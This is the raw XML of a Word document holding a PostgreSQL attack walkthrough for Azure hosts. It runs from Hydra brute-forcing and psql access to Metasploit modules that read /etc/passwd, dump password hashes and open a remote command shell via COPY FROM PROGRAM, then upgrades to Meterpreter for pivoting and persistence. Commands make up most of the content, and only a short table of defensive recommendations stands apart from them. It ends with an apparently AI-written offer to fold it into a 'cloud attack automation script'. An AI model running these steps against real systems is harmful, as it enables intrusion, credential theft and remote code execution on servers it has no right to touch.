          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>If successful</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, Hydra will return valid credentials like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A26AC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[5432][postgres] host: &lt;target-ip&gt;   login: postgres   password: 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A6255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16C29148">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7B4C83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lastRenderedPageBreak/>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Remote Connection to PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44334489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With valid credentials, connect using the built-in psql client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD91ADA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psql -h &lt;target-ip&gt; -U postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE80A4B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You can now list databases and users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFA4B5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\l        -- list databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABE75D7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\du       -- list users and roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB9AE4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414C38F2">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331D1E0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💣</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 4: Exploitation Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D6F4C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📁</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module 1: Read Arbitrary Files (postgres_readfile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB35FD1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If you have superuser credentials, you can read sensitive files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FD162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use auxiliary/admin/postgres/postgres_readfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C06B34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RHOSTS &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD7220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USERNAME postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6FECFF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PASSWORD 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3D565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RFILE /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E469A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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766763A6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243178D4">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7766D21C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🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module 2: Execute Arbitrary SQL Queries (postgres_sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E977149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Use this for banner grabbing or dumping table data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1D3C3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use auxiliary/admin/postgres/postgres_sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85BC4D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RHOSTS &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7195B55B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USERNAME ignite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B46AB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PASSWORD 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B2C319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SQL 'SELECT version();'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF359AB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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C3C8D0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 xml:space="preserve">You can run </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>arbitrary SQL queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using this module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFBCFA5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18F5197C">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59BEFE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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module 3: Dump All Password Hashes (postgres_hashdump)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700C5C7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use auxiliary/scanner/postgres/postgres_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B04348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RHOSTS &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11C86C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USERNAME postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142919A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PASSWORD 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D8ADE5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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093E1DE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Hashes may be stored in internal tables and could be cracked offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144CB38E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0DDF73EE">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D910103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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module 4: Remote Command Execution via COPY FROM PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0B34C" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL 9.3+</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows execution of OS commands if the user has pg_execute_server_program or superuser rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B30F8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use exploit/multi/postgres/postgres_copy_from_program_cmd_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A26313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RHOSTS &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BFA698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LHOST &lt;attacker-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B66F520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USERNAME postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6B9A6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set PASSWORD 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CD3DF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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7278DF2F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 xml:space="preserve">This will spawn a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>command shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the remote PostgreSQL server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221711BA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506F28AF">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0FC597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🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 5: Escalate to Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C1475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After gaining a basic shell, upgrade to a Meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249CE35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sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04788AEB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sessions -u &lt;session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F760DAC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sessions &lt;new_session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF75116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This allows you to dump files, pivot, and establish persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE650D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lastRenderedPageBreak/>
        <w:pict w14:anchorId="53789664">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A77612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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Security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5190"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="0B6BDB37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95BEA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FF815DF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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="31348C11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803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0AD53A91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Never expose PostgreSQL (5432) to the public Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="50DD049A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3547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PG_HBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="187EBB1D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Limit access to known IPs/subnets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="3C39949D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6335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7218CB3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Enforce SSL for PostgreSQL connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="74490F4E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2062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1471FECF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Restrict superuser role usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="0355E9FF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27CF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C4D0F70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 xml:space="preserve">Enable </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51945">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Azure Monitor Logs</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51945">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51945">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="3DC0196E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98D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VNet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F3ACC64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 xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51945">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Private Endpoint</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51945">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51945">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>VNet Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D9C699B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542E6BD8">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C0E37" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257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📋</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary of Attack Chain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995"/>
        <w:gridCol w:w="2629"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="738B3249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A2294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BDD765C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Tool/Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A128528" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="3900D50F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03C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Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="473F6487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nmap -sV -p5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66006A74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Discover PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="34C56337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7005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Credential Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75A86C45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hydra -L users.txt -P passwords.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="594E8807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Brute-force login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="77DC9B49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F353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Manual Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15326F6D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psql -h target -U postgres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE96BE2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Log in remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="2B374BDB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25B8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1C39FAC2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Metasploit modules (readfile, sql, rce)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7755A211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Access sensitive data/RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="20426A8B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D6C5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Shell Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74ECFE9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postgres_copy_from_program_cmd_exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42F0859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Gain command shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="5237BF4A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2B2B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Privilege Upgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67CACDD6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sessions -u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A4773F0" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257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Convert to Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FB25273" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="13EC1E6E">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3711D414" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like this saved as a Markdown/PDF format for your Azure Pentesting playbook or integrated into a cloud attack automation script?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A40A89B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B3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="175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3891"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F2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0198"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="808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732DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFA0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04853">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="980038613">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1623918427">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="798376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57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257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172B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7AB60FD3-0E13-4665-B6D8-E3E66A3B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257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57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57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57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57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57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5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3F42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57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3F4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57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3F4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912</Words>
  <Characters>5203</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>43</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2026-04-06T12:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T12:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>